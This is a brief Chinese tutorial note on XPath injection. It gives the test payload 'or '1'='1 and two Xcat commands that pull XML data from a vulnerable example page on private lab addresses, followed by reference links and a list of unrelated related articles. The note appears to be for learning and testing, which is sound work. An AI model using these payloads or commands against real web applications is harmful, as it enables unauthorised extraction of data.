XPath注入笔记
本文共 598 字,大约阅读时间需要 1 分钟。
XPath注入
XQuery注入
测试语句:'or '1'='1
利用工具:
Xcat介绍
Xcat是python的命令行程序利用Xpath的注入漏洞在Web应用中检索XML文档
下载地址:https://github.com/orf/xcat
使用说明:http://xcat.readthedocs.io/en/latest/#about-xcat
python3.4.1环境 pip install xcat
常用命令读取xml文件:
xcat.py --method=GET --public-ip="192.168.91.139" http://192 .168.91.139/xml/example2.php name=hacker name "Hello hacker" run retrieve
xcat "http://192.168.8.130/xml/example2.php" name name=hacker -m GET -o 192.168.8.130 -t "Hello hacker" -s
参考资料:
XPath Hacking技术科普 http://www.freebuf.com/articles/web/23184.html
XPath盲注简介 http://blog.csdn.net/yefan2222/article/details/7227932
你可能感兴趣的文章
六套 App:构建我的产品设计工作流
查看>>
eoLinker-API_Shop_通讯服务类API调用的代码示例合集:短信服务、手机号归属地查询、电信基站查询等...
查看>>
因为小程序的scroll-view组件不能下拉刷新我做了个开源项目
查看>>
JavaScript 垃圾回收机制
查看>>
前端面试回忆录 - 滴滴篇 - 凉面
查看>>
jxl导入Excel 切割List 并使用MyBatis批量插入数据库
查看>>
BMIP002协议介绍
查看>>
前端的一些基础知识
查看>>
小程序开发总结
查看>>
重绘与回流
查看>>
win10系统设置webp文件默认用照片查看器打开的两种方法
查看>>
使用阿里云发送邮件
查看>>
Tomcat监听器设计思路
查看>>
react native 入门之javascript
查看>>
管理ORACLE实例
查看>>
Confluence 6 MySQL 数据库设置准备
查看>>
Ruby 中 0/0.0 = NaN
查看>>
Confluence 6 教程:空间高手
查看>>
JEESNS数据库表设计结构
查看>>
JavaScript学习笔记:判断变量是否为undefined,判断变量和函数是否声明
查看>>